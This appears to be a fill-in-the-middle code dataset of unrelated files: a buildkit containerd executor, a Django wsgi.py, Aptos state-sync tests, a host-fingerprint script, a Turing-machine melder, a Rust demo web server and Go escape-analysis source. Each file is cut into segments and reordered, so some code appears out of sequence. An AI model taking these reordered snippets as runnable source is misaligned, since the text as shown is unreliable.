}
proc.User = specs.User{
UID: uid,
GID: gid,
AdditionalGids: []uint32{},
}
}
proc.Terminal = meta.Tty
proc.Args = meta.Args
if meta.Cwd != "" {
spec.Process.Cwd = meta.Cwd
}
if len(process.Meta.Env) > 0 {
spec.Process.Env = process.Meta.Env
}
fixProcessOutput(&process)
cioOpts := []cio.Opt{cio.WithStreams(process.Stdin, process.Stdout, process.Stderr)}
if meta.Tty {
cioOpts = append(cioOpts, cio.WithTerminal)
}
taskProcess, err := task.Exec(ctx, identity.NewID(), proc, cio.NewCreator(cioOpts...))
if err != nil {
return errors.WithStack(err)
}
err = w.runProcess(ctx, taskProcess, process.Resize, nil)
return err
}
func fixProcessOutput(process *executor.ProcessInfo) {
// It seems like if containerd has one of stdin, stdout or stderr then the
// others need to be present as well otherwise we get this error:
// failed to start io pipe copy: unable to copy pipes: containerd-shim: opening file "" failed: open : no such file or directory: unknown
// So just stub out any missing output
if process.Stdout == nil {
process.Stdout = &nopCloser{ioutil.Discard}
}
if process.Stderr == nil {
process.Stderr = &nopCloser{ioutil.Discard}
}
}
func (w *containerdExecutor) runProcess(ctx context.Context, p containerd.Process, resize <-chan executor.WinSize, started func()) error {
// Not using `ctx` here because the context passed only affects the statusCh which we
// don't want cancelled when ctx.Done is sent. We want to process statusCh on cancel.
statusCh, err := p.Wait(context.Background())
if err != nil {
return err
}
io := p.IO()
defer func() {
io.Wait()
io.Close()
}()
err = p.Start(ctx)
if err != nil {
return err
}
if started != nil {
started()
}
p.CloseIO(ctx, containerd.WithStdinCloser)
// handle resize events in a separate goroutine so they do not
// potentially block the container cancel/exit status loop below.
resizeCtx, resizeCancel := context.WithCancel(ctx)
defer resizeCancel()
go func() {
for {
select {
case <-resizeCtx.Done():
return
case size, ok := <-resize:
if !ok {
return // chan closed
}
err = p.Resize(resizeCtx, size.Cols, size.Rows)
if err != nil {
bklog.G(resizeCtx).Warnf("Failed to resize %s: %s", p.ID(), err)
}
}
}
}()
var cancel func()
var killCtxDone <-chan struct{}
ctxDone := ctx.Done()
for {
select {
case <-ctxDone:
ctxDone = nil
var killCtx context.Context
killCtx, cancel = context.WithTimeout(context.Background(), 10*time.Second)
killCtxDone = killCtx.Done()
p.Kill(killCtx, syscall.SIGKILL)
io.Cancel()
case status := <-statusCh:
if cancel != nil {
cancel()
}
if status.ExitCode() != 0 {
exitErr := &gatewayapi.ExitError{
ExitCode: status.ExitCode(),
Err: status.Error(),
}
if status.ExitCode() == gatewayapi.UnknownExitStatus && status.Error() != nil {
exitErr.Err = errors.Wrap(status.Error(), "failure waiting for process")
}
select {
case <-ctx.Done():
exitErr.Err = errors.Wrap(ctx.Err(), exitErr.Error())
default:
}
return exitErr
}
return nil
case <-killCtxDone:
if cancel != nil {
cancel()
}
io.Cancel()
return errors.Errorf("failed to kill process on cancel")
}
}
}
type nopCloser struct {
io.Writer
}
func (c *nopCloser) Close() error {
return nil
} | |
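// Hedged usage sketch (not part of this package): wiring the executor to a
// containerd daemon; network providers, DNS config and security profiles are
// elided here.
//
//	client, err := containerd.New("/run/containerd/containerd.sock")
//	if err != nil {
//		return err
//	}
//	exec := New(client, "/var/lib/buildkit", "", networkProviders, nil, "", "")
//	_ = exec // hand off to the buildkit worker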
wsgi.py | """
WSGI config for maillerApp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ | from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'maillerApp.settings')
application = get_wsgi_application() | """
import os
|
driver.rs | // Copyright (c) Aptos
// SPDX-License-Identifier: Apache-2.0
use crate::{
driver_factory::DriverFactory,
tests::utils::{
create_event, create_ledger_info_at_version, create_transaction,
verify_mempool_and_event_notification,
},
};
use aptos_config::config::{NodeConfig, RoleType};
use aptos_data_client::aptosnet::AptosNetDataClient;
use aptos_infallible::RwLock;
use aptos_time_service::TimeService;
use aptos_types::{
event::EventKey,
move_resource::MoveStorage,
on_chain_config::{new_epoch_event_key, ON_CHAIN_CONFIG_REGISTRY},
transaction::{Transaction, WriteSetPayload},
waypoint::Waypoint,
};
use aptos_vm::AptosVM;
use aptosdb::AptosDB;
use claim::{assert_err, assert_none};
use consensus_notifications::{ConsensusNotificationSender, ConsensusNotifier};
use data_streaming_service::streaming_client::new_streaming_service_client_listener_pair;
use event_notifications::{
EventNotificationListener, EventNotificationSender, EventSubscriptionService,
ReconfigNotificationListener,
};
use executor::chunk_executor::ChunkExecutor;
use executor_test_helpers::bootstrap_genesis;
use futures::{FutureExt, StreamExt};
use mempool_notifications::MempoolNotificationListener;
use network::application::{interface::MultiNetworkSender, storage::PeerMetadataStorage};
use std::{collections::HashMap, sync::Arc};
use storage_interface::{DbReader, DbReaderWriter};
use storage_service_client::StorageServiceClient;
// TODO(joshlind): extend these tests to cover more functionality!
#[tokio::test(flavor = "multi_thread")]
async fn test_auto_bootstrapping() {
// Create a driver for a validator with a waypoint at version 0
let (validator_driver, _, _, _, _) = create_validator_driver(None).await;
// Wait until the validator is bootstrapped (auto-bootstrapping should occur)
let driver_client = validator_driver.create_driver_client();
driver_client.notify_once_bootstrapped().await.unwrap();
}
#[tokio::test]
async fn test_consensus_commit_notification() {
// Create a driver for a full node
let (_full_node_driver, consensus_notifier, _, _, _) = create_full_node_driver(None).await;
// Verify that full nodes can't process commit notifications
let result = consensus_notifier
.notify_new_commit(vec![create_transaction()], vec![])
.await;
assert_err!(result);
// Create a driver for a validator with a waypoint at version 0
let (_validator_driver, consensus_notifier, _, _, _) = create_validator_driver(None).await;
// Send a new commit notification and verify the node isn't bootstrapped
let result = consensus_notifier
.notify_new_commit(vec![create_transaction()], vec![])
.await;
assert_err!(result);
}
#[tokio::test]
async fn test_mempool_commit_notifications() {
// Create a driver for a validator with a waypoint at version 0
let subscription_event_key = EventKey::random();
let (validator_driver, consensus_notifier, mut mempool_listener, _, mut event_listener) =
create_validator_driver(Some(vec![subscription_event_key])).await;
// Wait until the validator is bootstrapped
let driver_client = validator_driver.create_driver_client();
driver_client.notify_once_bootstrapped().await.unwrap();
// Create commit data for testing
let transactions = vec![create_transaction(), create_transaction()];
let events = vec![
create_event(Some(subscription_event_key)),
create_event(Some(subscription_event_key)),
];
// Send a new consensus commit notification to the driver
let committed_transactions = transactions.clone();
let committed_events = events.clone();
let join_handle = tokio::spawn(async move {
consensus_notifier
.notify_new_commit(committed_transactions, committed_events)
.await
.unwrap();
});
// Verify mempool is notified and that the event listener is notified
verify_mempool_and_event_notification(
Some(&mut event_listener),
&mut mempool_listener,
transactions,
events,
)
.await;
// Ensure the consensus notification is acknowledged
join_handle.await.unwrap();
}
#[tokio::test]
async fn test_reconfiguration_notifications() {
// Create a driver for a validator with a waypoint at version 0
let (validator_driver, consensus_notifier, mut mempool_listener, mut reconfig_listener, _) =
create_validator_driver(None).await;
// Wait until the validator is bootstrapped
let driver_client = validator_driver.create_driver_client();
driver_client.notify_once_bootstrapped().await.unwrap();
// Test different events
let reconfiguration_event = new_epoch_event_key();
for event_key in [
EventKey::random(),
reconfiguration_event,
EventKey::random(),
reconfiguration_event,
] {
// Create commit data for testing
let transactions = vec![create_transaction(), create_transaction()];
let events = vec![create_event(Some(event_key))];
// Send a new consensus commit notification to the driver
let committed_transactions = transactions.clone();
let committed_events = events.clone();
let consensus_notifier = consensus_notifier.clone();
let join_handle = tokio::spawn(async move {
consensus_notifier
.notify_new_commit(committed_transactions, committed_events)
.await
.unwrap();
});
// Verify mempool is notified
verify_mempool_and_event_notification(None, &mut mempool_listener, transactions, events)
.await;
// Verify the reconfiguration listener is notified if a reconfiguration occurred
if event_key == reconfiguration_event {
let reconfig_notification = reconfig_listener.select_next_some().await;
assert_eq!(reconfig_notification.version, 0);
} else {
assert_none!(reconfig_listener.select_next_some().now_or_never());
}
// Ensure the consensus notification is acknowledged
join_handle.await.unwrap();
}
}
#[tokio::test]
async fn test_consensus_sync_request() {
// Create a driver for a full node
let (_full_node_driver, consensus_notifier, _, _, _) = create_full_node_driver(None).await;
// Verify that full nodes can't process sync requests
let result = consensus_notifier
.sync_to_target(create_ledger_info_at_version(0))
.await;
assert_err!(result);
// Create a driver for a validator with a waypoint at version 0
let (_validator_driver, consensus_notifier, _, _, _) = create_validator_driver(None).await;
// Send a new sync request and verify the node isn't bootstrapped
let result = consensus_notifier
.sync_to_target(create_ledger_info_at_version(0))
.await;
assert_err!(result);
}
/// Creates a state sync driver for a validator node
async fn create_validator_driver(
event_key_subscriptions: Option<Vec<EventKey>>,
) -> (
DriverFactory,
ConsensusNotifier,
MempoolNotificationListener,
ReconfigNotificationListener,
EventNotificationListener, |
create_driver_for_tests(node_config, Waypoint::default(), event_key_subscriptions).await
}
/// Creates a state sync driver for a full node
async fn create_full_node_driver(
event_key_subscriptions: Option<Vec<EventKey>>,
) -> (
DriverFactory,
ConsensusNotifier,
MempoolNotificationListener,
ReconfigNotificationListener,
EventNotificationListener,
) {
let mut node_config = NodeConfig::default();
node_config.base.role = RoleType::FullNode;
create_driver_for_tests(node_config, Waypoint::default(), event_key_subscriptions).await
}
/// Creates a state sync driver using the given node config and waypoint
async fn create_driver_for_tests(
node_config: NodeConfig,
waypoint: Waypoint,
event_key_subscriptions: Option<Vec<EventKey>>,
) -> (
DriverFactory,
ConsensusNotifier,
MempoolNotificationListener,
ReconfigNotificationListener,
EventNotificationListener,
) {
// Create test aptos database
let db_path = aptos_temppath::TempPath::new();
db_path.create_as_dir().unwrap();
let (db, db_rw) = DbReaderWriter::wrap(AptosDB::new_for_test(db_path.path()));
// Bootstrap the genesis transaction
let (genesis, _) = vm_genesis::test_genesis_change_set_and_validators(Some(1));
let genesis_txn = Transaction::GenesisTransaction(WriteSetPayload::Direct(genesis));
bootstrap_genesis::<AptosVM>(&db_rw, &genesis_txn).unwrap();
// Create the event subscription service and subscribe to events and reconfigurations
let storage: Arc<dyn DbReader> = db;
let synced_version = (&*storage).fetch_latest_state_checkpoint_version().unwrap();
let mut event_subscription_service = EventSubscriptionService::new(
ON_CHAIN_CONFIG_REGISTRY,
Arc::new(RwLock::new(db_rw.clone())),
);
let mut reconfiguration_subscriber = event_subscription_service
.subscribe_to_reconfigurations()
.unwrap();
let event_key_subscriptions =
event_key_subscriptions.unwrap_or_else(|| vec![EventKey::random()]);
let event_subscriber = event_subscription_service
.subscribe_to_events(event_key_subscriptions)
.unwrap();
// Notify subscribers of the initial configs
event_subscription_service
.notify_initial_configs(synced_version)
.unwrap();
reconfiguration_subscriber.select_next_some().await;
// Create consensus and mempool notifiers and listeners
let (consensus_notifier, consensus_listener) =
consensus_notifications::new_consensus_notifier_listener_pair(5000);
let (mempool_notifier, mempool_listener) =
mempool_notifications::new_mempool_notifier_listener_pair();
// Create the chunk executor
let chunk_executor = Arc::new(ChunkExecutor::<AptosVM>::new(db_rw.clone()).unwrap());
// Create a streaming service client
let (streaming_service_client, _) = new_streaming_service_client_listener_pair();
// Create a test aptos data client
let network_client = StorageServiceClient::new(
MultiNetworkSender::new(HashMap::new()),
PeerMetadataStorage::new(&[]),
);
let (aptos_data_client, _) = AptosNetDataClient::new(
node_config.state_sync.aptos_data_client,
node_config.state_sync.storage_service,
TimeService::mock(),
network_client,
None,
);
// Create and spawn the driver
let driver_factory = DriverFactory::create_and_spawn_driver(
false,
&node_config,
waypoint,
db_rw,
chunk_executor,
mempool_notifier,
consensus_listener,
event_subscription_service,
aptos_data_client,
streaming_service_client,
);
(
driver_factory,
consensus_notifier,
mempool_listener,
reconfiguration_subscriber,
event_subscriber,
)
} | ) {
let mut node_config = NodeConfig::default();
node_config.base.role = RoleType::Validator; |
make_fingerprint.py | #!/usr/bin/env python3
import codecs
import hashlib
import random_tweets
import requests
import sys
def | (url):
host = requests.urllib3.util.url.parse_url(url).host
if host is None:
host = '-INVALID-'
fingerprint = hashlib.md5(host.encode('utf-8')).hexdigest()
comment = codecs.getencoder('base64')(host.encode('utf-8'))[0].decode('ascii').rstrip('\n=')
return host, fingerprint, comment
def run(args):
if len(args) == 0:
print('Usage: {} <HOSTNAMES...>'.format(sys.argv[0]), file=sys.stderr)
return 1
for url in args:
host, fingerprint, comment = make_fingerprint(url)
#print(" '{f}', # {c}, {h}"
print(" '{f}', # {c}"
.format(u=url, h=host, f=fingerprint, c=comment))
return 0
if __name__ == '__main__':
exit(run(sys.argv[1:]))
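# Hedged example: only the host part of the URL is fingerprinted, so any path
# or scheme variation of the same host yields the same md5; the comment column
# is the base64 of the host.
#
#   host, fp, comment = make_fingerprint('https://example.com/a/path')
#   host == 'example.com'
#   fp == hashlib.md5(b'example.com').hexdigest()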
| make_fingerprint |
tmmelder.py | # This program melds together two Turing machines;
# that is, if the first machine ends up in an "OUT" state,
# this program outputs a TM where the out state of the first machine
# is the start state of the second
import sys
import tmsim
def alphabetMSToTS():
|
def convertStatesToString(listOfStates, output):
numberOfStates = len(listOfStates)
output.write("States: " + str(numberOfStates) + "\n")
output.write("\n")
statesIveAlreadyPrinted = {}
for state in listOfStates:
try:
assert state.stateName not in statesIveAlreadyPrinted
except AssertionError:
print(state.stateName)
raise
statesIveAlreadyPrinted[state.stateName] = None
if state.isStartState:
output.write("START ")
output.write(state.stateName + ":\n")
for symbol in alphabetMSToTS():
output.write("\t" + symbol + " -> " + state.getNextStateName(symbol) + "; " + \
state.getHeadMove(symbol) + "; " + state.getWrite(symbol) + "\n")
output.write("\n")
if __name__ == "__main__":
inMachineName = sys.argv[1]
outMachineName = sys.argv[2]
try:
assert inMachineName != outMachineName
except:
print "Error: cannot meld two machines that have the same name."
raise
inMachine = tmsim.SingleTapeTuringMachine("../tm2_files/" + sys.argv[1] + ".tm2", \
alphabetMSToTS())
outMachine = tmsim.SingleTapeTuringMachine("../tm2_files/" + sys.argv[2] + ".tm2", \
alphabetMSToTS())
for state in inMachine.listOfRealStates:
for symbol in alphabetMSToTS():
nextState = state.getNextState(symbol)
if nextState.stateName == "OUT":
state.setNextState(symbol, outMachine.startState)
for state in outMachine.listOfRealStates:
state.isStartState = False
convertStatesToString(inMachine.listOfRealStates + outMachine.listOfRealStates, \
open("../tm2_files/" + sys.argv[3] + ".tm2", "w")) | return ["a", "b"] |
main.rs | use std::fs;
use std::io::prelude::*;
use std::net::TcpListener;
use std::net::TcpStream;
use std::thread;
use std::time::Duration;
use hello_web::ThreadPool;
fn main() {
let listener = TcpListener::bind("127.0.0.1:7878").unwrap();
let pool = ThreadPool::new(4);
// accept only two connections before shutting down (demo of graceful shutdown)
for stream in listener.incoming().take(2) {
let stream = stream.unwrap();
pool.execute(|| {
handle_connection(stream);
});
}
println!("Shutting down.");
}
fn handle_connection(mut stream: TcpStream) {
let mut buffer = [0; 1024];
stream.read(&mut buffer).unwrap();
let get = b"GET / HTTP/1.1\r\n";
let sleep = b"GET /sleep HTTP/1.1\r\n";
let (status_line, filename) = if buffer.starts_with(get) {
("HTTP/1.1 200 OK", "hello.html")
} else if buffer.starts_with(sleep) {
thread::sleep(Duration::from_secs(5));
("HTTP/1.1 200 OK", "hello.html")
} else {
("HTTP/1.1 404 NOT FOUND", "404.html")
};
let contents = fs::read_to_string(filename).unwrap();
let response = format!(
"{}\r\nContent-Length: {}\r\n\r\n{}",
status_line,
contents.len(), | stream.write(response.as_bytes()).unwrap();
stream.flush().unwrap();
} | contents
);
|
escape.go | // Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package gc
import (
"cmd/compile/internal/logopt"
"cmd/compile/internal/types"
"cmd/internal/src"
"fmt"
"math"
"strings"
)
// Escape analysis.
//
// Here we analyze functions to determine which Go variables
// (including implicit allocations such as calls to "new" or "make",
// composite literals, etc.) can be allocated on the stack. The two
// key invariants we have to ensure are: (1) pointers to stack objects
// cannot be stored in the heap, and (2) pointers to a stack object
// cannot outlive that object (e.g., because the declaring function
// returned and destroyed the object's stack frame, or its space is
// reused across loop iterations for logically distinct variables).
//
// We implement this with a static data-flow analysis of the AST.
// First, we construct a directed weighted graph where vertices
// (termed "locations") represent variables allocated by statements
// and expressions, and edges represent assignments between variables
// (with weights representing addressing/dereference counts).
//
// Next we walk the graph looking for assignment paths that might
// violate the invariants stated above. If a variable v's address is
// stored in the heap or elsewhere that may outlive it, then v is
// marked as requiring heap allocation.
//
// To support interprocedural analysis, we also record data-flow from
// each function's parameters to the heap and to its result
// parameters. This information is summarized as "parameter tags",
// which are used at static call sites to improve escape analysis of
// function arguments.
// Constructing the location graph.
//
// Every allocating statement (e.g., variable declaration) or
// expression (e.g., "new" or "make") is first mapped to a unique
// "location."
//
// We also model every Go assignment as a directed edge between
// locations. The number of dereference operations minus the number of
// addressing operations is recorded as the edge's weight (termed
// "derefs"). For example:
//
// p = &q // -1
// p = q // 0
// p = *q // 1
// p = **q // 2
//
// p = **&**&q // 2
//
// Note that the & operator can only be applied to addressable
// expressions, and the expression &x itself is not addressable, so
// derefs cannot go below -1.
//
// Every Go language construct is lowered into this representation,
// generally without sensitivity to flow, path, or context; and
// without distinguishing elements within a compound variable. For
// example:
//
// var x struct { f, g *int }
// var u []*int
//
// x.f = u[0]
//
// is modeled simply as
//
// x = *u
//
// That is, we don't distinguish x.f from x.g, or u[0] from u[1],
// u[2], etc. However, we do record the implicit dereference involved
// in indexing a slice.
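// For intuition (hedged example, not from this package): a pointer to a local
// flowing to a function result forces a heap allocation, which
// `go build -gcflags=-m` reports as "moved to heap: x".
//
//	func leak() *int {
//		x := 42
//		return &x // &x reaches the result location, so x escapes
//	}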
type Escape struct {
allLocs []*EscLocation
curfn *Node
// loopDepth counts the current loop nesting depth within
// curfn. It increments within each "for" loop and at each
// label with a corresponding backwards "goto" (i.e.,
// unstructured loop).
loopDepth int
heapLoc EscLocation
blankLoc EscLocation
}
// An EscLocation represents an abstract location that stores a Go
// variable.
type EscLocation struct {
n *Node // represented variable or expression, if any
curfn *Node // enclosing function
edges []EscEdge // incoming edges
loopDepth int // loopDepth at declaration
// derefs and walkgen are used during walkOne to track the
// minimal dereferences from the walk root.
derefs int // >= -1
walkgen uint32
// dst and dstEdgeIdx track the next immediate assignment
// destination location during walkOne, along with the index
// of the edge pointing back to this location.
dst *EscLocation
dstEdgeIdx int
// queued is used by walkAll to track whether this location is
// in the walk queue.
queued bool
// escapes reports whether the represented variable's address
// escapes; that is, whether the variable must be heap
// allocated.
escapes bool
// transient reports whether the represented expression's
// address does not outlive the statement; that is, whether
// its storage can be immediately reused.
transient bool
// paramEsc records the represented parameter's leak set.
paramEsc EscLeaks
}
// An EscEdge represents an assignment edge between two Go variables.
type EscEdge struct {
src *EscLocation
derefs int // >= -1
notes *EscNote
}
// escapeFuncs performs escape analysis on a minimal batch of
// functions.
func escapeFuncs(fns []*Node, recursive bool) {
for _, fn := range fns {
if fn.Op != ODCLFUNC {
Fatalf("unexpected node: %v", fn)
}
}
var e Escape
e.heapLoc.escapes = true
// Construct data-flow graph from syntax trees.
for _, fn := range fns {
e.initFunc(fn)
}
for _, fn := range fns {
e.walkFunc(fn)
}
e.curfn = nil
e.walkAll()
e.finish(fns)
}
func (e *Escape) initFunc(fn *Node) {
if fn.Op != ODCLFUNC || fn.Esc != EscFuncUnknown {
Fatalf("unexpected node: %v", fn)
}
fn.Esc = EscFuncPlanned
if Debug.m > 3 {
Dump("escAnalyze", fn)
}
e.curfn = fn
e.loopDepth = 1
// Allocate locations for local variables.
for _, dcl := range fn.Func.Dcl {
if dcl.Op == ONAME {
e.newLoc(dcl, false)
}
}
}
func (e *Escape) walkFunc(fn *Node) {
fn.Esc = EscFuncStarted
// Identify labels that mark the head of an unstructured loop.
inspectList(fn.Nbody, func(n *Node) bool {
switch n.Op {
case OLABEL:
n.Sym.Label = asTypesNode(&nonlooping)
case OGOTO:
// If we visited the label before the goto,
// then this is a looping label.
if n.Sym.Label == asTypesNode(&nonlooping) {
n.Sym.Label = asTypesNode(&looping)
}
}
return true
})
e.curfn = fn
e.loopDepth = 1
e.block(fn.Nbody)
}
// Below we implement the methods for walking the AST and recording
// data flow edges. Note that because a sub-expression might have
// side-effects, it's important to always visit the entire AST.
//
// For example, write either:
//
// if x {
// e.discard(n.Left)
// } else {
// e.value(k, n.Left)
// }
//
// or
//
// if x {
// k = e.discardHole()
// }
// e.value(k, n.Left)
//
// Do NOT write:
//
// // BAD: possibly loses side-effects within n.Left
// if !x {
// e.value(k, n.Left)
// }
// stmt evaluates a single Go statement.
func (e *Escape) stmt(n *Node) {
if n == nil {
return
}
lno := setlineno(n)
defer func() {
lineno = lno
}()
if Debug.m > 2 {
fmt.Printf("%v:[%d] %v stmt: %v\n", linestr(lineno), e.loopDepth, funcSym(e.curfn), n)
}
e.stmts(n.Ninit)
switch n.Op {
default:
Fatalf("unexpected stmt: %v", n)
case ODCLCONST, ODCLTYPE, OEMPTY, OFALL, OINLMARK:
// nop
case OBREAK, OCONTINUE, OGOTO:
// TODO(mdempsky): Handle dead code?
case OBLOCK:
e.stmts(n.List)
case ODCL:
// Record loop depth at declaration.
if !n.Left.isBlank() {
e.dcl(n.Left)
}
case OLABEL:
switch asNode(n.Sym.Label) {
case &nonlooping:
if Debug.m > 2 {
fmt.Printf("%v:%v non-looping label\n", linestr(lineno), n)
}
case &looping:
if Debug.m > 2 {
fmt.Printf("%v: %v looping label\n", linestr(lineno), n)
}
e.loopDepth++
default:
Fatalf("label missing tag")
}
n.Sym.Label = nil
case OIF:
e.discard(n.Left)
e.block(n.Nbody)
e.block(n.Rlist)
case OFOR, OFORUNTIL:
e.loopDepth++
e.discard(n.Left)
e.stmt(n.Right)
e.block(n.Nbody)
e.loopDepth--
case ORANGE:
// for List = range Right { Nbody }
e.loopDepth++
ks := e.addrs(n.List)
e.block(n.Nbody)
e.loopDepth--
// Right is evaluated outside the loop.
k := e.discardHole()
if len(ks) >= 2 {
if n.Right.Type.IsArray() {
k = ks[1].note(n, "range")
} else {
k = ks[1].deref(n, "range-deref")
}
}
e.expr(e.later(k), n.Right)
case OSWITCH:
typesw := n.Left != nil && n.Left.Op == OTYPESW
var ks []EscHole
for _, cas := range n.List.Slice() { // cases
if typesw && n.Left.Left != nil {
cv := cas.Rlist.First()
k := e.dcl(cv) // type switch variables have no ODCL.
if cv.Type.HasPointers() {
ks = append(ks, k.dotType(cv.Type, cas, "switch case"))
}
}
e.discards(cas.List)
e.block(cas.Nbody)
}
if typesw {
e.expr(e.teeHole(ks...), n.Left.Right)
} else {
e.discard(n.Left)
}
case OSELECT:
for _, cas := range n.List.Slice() {
e.stmt(cas.Left)
e.block(cas.Nbody)
}
case OSELRECV:
e.assign(n.Left, n.Right, "selrecv", n)
case OSELRECV2:
e.assign(n.Left, n.Right, "selrecv", n)
e.assign(n.List.First(), nil, "selrecv", n)
case ORECV:
// TODO(mdempsky): Consider e.discard(n.Left).
e.exprSkipInit(e.discardHole(), n) // already visited n.Ninit
case OSEND:
e.discard(n.Left)
e.assignHeap(n.Right, "send", n)
case OAS, OASOP:
e.assign(n.Left, n.Right, "assign", n)
case OAS2:
for i, nl := range n.List.Slice() {
e.assign(nl, n.Rlist.Index(i), "assign-pair", n)
}
case OAS2DOTTYPE: // v, ok = x.(type)
e.assign(n.List.First(), n.Right, "assign-pair-dot-type", n)
e.assign(n.List.Second(), nil, "assign-pair-dot-type", n)
case OAS2MAPR: // v, ok = m[k]
e.assign(n.List.First(), n.Right, "assign-pair-mapr", n)
e.assign(n.List.Second(), nil, "assign-pair-mapr", n)
case OAS2RECV: // v, ok = <-ch
e.assign(n.List.First(), n.Right, "assign-pair-receive", n)
e.assign(n.List.Second(), nil, "assign-pair-receive", n)
case OAS2FUNC:
e.stmts(n.Right.Ninit)
e.call(e.addrs(n.List), n.Right, nil)
case ORETURN:
results := e.curfn.Type.Results().FieldSlice()
for i, v := range n.List.Slice() {
e.assign(asNode(results[i].Nname), v, "return", n)
}
case OCALLFUNC, OCALLMETH, OCALLINTER, OCLOSE, OCOPY, ODELETE, OPANIC, OPRINT, OPRINTN, ORECOVER:
e.call(nil, n, nil)
case OGO, ODEFER:
e.stmts(n.Left.Ninit)
e.call(nil, n.Left, n)
case ORETJMP:
// TODO(mdempsky): What do? esc.go just ignores it.
}
}
func (e *Escape) stmts(l Nodes) {
for _, n := range l.Slice() {
e.stmt(n)
}
}
// block is like stmts, but preserves loopDepth.
func (e *Escape) block(l Nodes) {
old := e.loopDepth
e.stmts(l)
e.loopDepth = old
}
// expr models evaluating an expression n and flowing the result into
// hole k.
func (e *Escape) expr(k EscHole, n *Node) {
if n == nil {
return
}
e.stmts(n.Ninit)
e.exprSkipInit(k, n)
}
func (e *Escape) exprSkipInit(k EscHole, n *Node) {
if n == nil {
return
}
lno := setlineno(n)
defer func() {
lineno = lno
}()
uintptrEscapesHack := k.uintptrEscapesHack
k.uintptrEscapesHack = false
if uintptrEscapesHack && n.Op == OCONVNOP && n.Left.Type.IsUnsafePtr() {
// nop
} else if k.derefs >= 0 && !n.Type.HasPointers() {
k = e.discardHole()
}
switch n.Op {
default:
Fatalf("unexpected expr: %v", n)
case OLITERAL, OGETG, OCLOSUREVAR, OTYPE:
// nop
case ONAME:
if n.Class() == PFUNC || n.Class() == PEXTERN {
return
}
e.flow(k, e.oldLoc(n))
case OPLUS, ONEG, OBITNOT, ONOT:
e.discard(n.Left)
case OADD, OSUB, OOR, OXOR, OMUL, ODIV, OMOD, OLSH, ORSH, OAND, OANDNOT, OEQ, ONE, OLT, OLE, OGT, OGE, OANDAND, OOROR:
e.discard(n.Left)
e.discard(n.Right)
case OADDR:
e.expr(k.addr(n, "address-of"), n.Left) // "address-of"
case ODEREF:
e.expr(k.deref(n, "indirection"), n.Left) // "indirection"
case ODOT, ODOTMETH, ODOTINTER:
e.expr(k.note(n, "dot"), n.Left)
case ODOTPTR:
e.expr(k.deref(n, "dot of pointer"), n.Left) // "dot of pointer"
case ODOTTYPE, ODOTTYPE2:
e.expr(k.dotType(n.Type, n, "dot"), n.Left)
case OINDEX:
if n.Left.Type.IsArray() {
e.expr(k.note(n, "fixed-array-index-of"), n.Left)
} else {
			// TODO(mdempsky): Fix the "why" reason text; slice indexing reuses "dot of pointer".
e.expr(k.deref(n, "dot of pointer"), n.Left)
}
e.discard(n.Right)
case OINDEXMAP:
e.discard(n.Left)
e.discard(n.Right)
case OSLICE, OSLICEARR, OSLICE3, OSLICE3ARR, OSLICESTR:
e.expr(k.note(n, "slice"), n.Left)
low, high, max := n.SliceBounds()
e.discard(low)
e.discard(high)
e.discard(max)
case OCONV, OCONVNOP:
if checkPtr(e.curfn, 2) && n.Type.IsUnsafePtr() && n.Left.Type.IsPtr() {
// When -d=checkptr=2 is enabled, treat
// conversions to unsafe.Pointer as an
// escaping operation. This allows better
// runtime instrumentation, since we can more
// easily detect object boundaries on the heap
// than the stack.
e.assignHeap(n.Left, "conversion to unsafe.Pointer", n)
} else if n.Type.IsUnsafePtr() && n.Left.Type.IsUintptr() {
e.unsafeValue(k, n.Left)
} else {
e.expr(k, n.Left)
}
case OCONVIFACE:
if !n.Left.Type.IsInterface() && !isdirectiface(n.Left.Type) {
k = e.spill(k, n)
}
e.expr(k.note(n, "interface-converted"), n.Left)
case ORECV:
e.discard(n.Left)
case OCALLMETH, OCALLFUNC, OCALLINTER, OLEN, OCAP, OCOMPLEX, OREAL, OIMAG, OAPPEND, OCOPY:
e.call([]EscHole{k}, n, nil)
case ONEW:
e.spill(k, n)
case OMAKESLICE:
e.spill(k, n)
e.discard(n.Left)
e.discard(n.Right)
case OMAKECHAN:
e.discard(n.Left)
case OMAKEMAP:
e.spill(k, n)
e.discard(n.Left)
case ORECOVER:
// nop
case OCALLPART:
// Flow the receiver argument to both the closure and
// to the receiver parameter.
closureK := e.spill(k, n)
m := callpartMethod(n)
// We don't know how the method value will be called
// later, so conservatively assume the result
// parameters all flow to the heap.
//
// TODO(mdempsky): Change ks into a callback, so that
// we don't have to create this dummy slice?
var ks []EscHole
for i := m.Type.NumResults(); i > 0; i-- {
ks = append(ks, e.heapHole())
}
paramK := e.tagHole(ks, asNode(m.Type.Nname()), m.Type.Recv())
e.expr(e.teeHole(paramK, closureK), n.Left)
case OPTRLIT:
e.expr(e.spill(k, n), n.Left)
case OARRAYLIT:
for _, elt := range n.List.Slice() {
if elt.Op == OKEY {
elt = elt.Right
}
e.expr(k.note(n, "array literal element"), elt)
}
case OSLICELIT:
k = e.spill(k, n)
k.uintptrEscapesHack = uintptrEscapesHack // for ...uintptr parameters
for _, elt := range n.List.Slice() {
if elt.Op == OKEY {
elt = elt.Right
}
e.expr(k.note(n, "slice-literal-element"), elt)
}
case OSTRUCTLIT:
for _, elt := range n.List.Slice() {
e.expr(k.note(n, "struct literal element"), elt.Left)
}
case OMAPLIT:
e.spill(k, n)
// Map keys and values are always stored in the heap.
for _, elt := range n.List.Slice() {
e.assignHeap(elt.Left, "map literal key", n)
e.assignHeap(elt.Right, "map literal value", n)
}
case OCLOSURE:
k = e.spill(k, n)
// Link addresses of captured variables to closure.
for _, v := range n.Func.Closure.Func.Cvars.Slice() {
if v.Op == OXXX { // unnamed out argument; see dcl.go:/^funcargs
continue
}
k := k
if !v.Name.Byval() {
k = k.addr(v, "reference")
}
e.expr(k.note(n, "captured by a closure"), v.Name.Defn)
}
case ORUNES2STR, OBYTES2STR, OSTR2RUNES, OSTR2BYTES, ORUNESTR:
e.spill(k, n)
e.discard(n.Left)
case OADDSTR:
e.spill(k, n)
// Arguments of OADDSTR never escape;
// runtime.concatstrings makes sure of that.
e.discards(n.List)
}
}
// unsafeValue evaluates a uintptr-typed arithmetic expression looking
// for conversions from an unsafe.Pointer.
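//
// For example (illustrative): in uintptr(unsafe.Pointer(p)) + 8, the
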